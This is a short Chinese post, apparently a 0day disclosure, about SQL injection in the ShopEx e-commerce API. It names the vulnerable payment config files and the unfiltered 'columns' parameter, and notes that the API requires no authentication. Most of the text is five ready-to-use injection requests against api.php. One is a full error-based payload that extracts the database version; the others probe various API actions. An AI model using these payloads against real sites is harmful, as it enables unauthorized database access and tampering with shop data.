shopEx SQL注入

shopEx 最新版的API注入一处

缺陷文件:
\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

第44行 $data[‘columns’] 未做过滤导致注入

外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.

注射1:

http://www.0day5.com/api.php

POST

act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

注射2:

http://www.0day5.com/shopex/api.php

act=add_category&api_version=3.1&datas={“name”:”name’ and 1=x %23″}

注射3:

http://www.0day5.com/shopex/api.php

act=get_spec_single&api_version=3.1&spec_id=1 xxx

注射4:

http://www.0day5.com/shopex/api.php

act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1&currency=1

注射5:

http://www.0day5.com/shopex/api.php

act=search_dly_h_area&return_data=string&columns=xxxxx

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录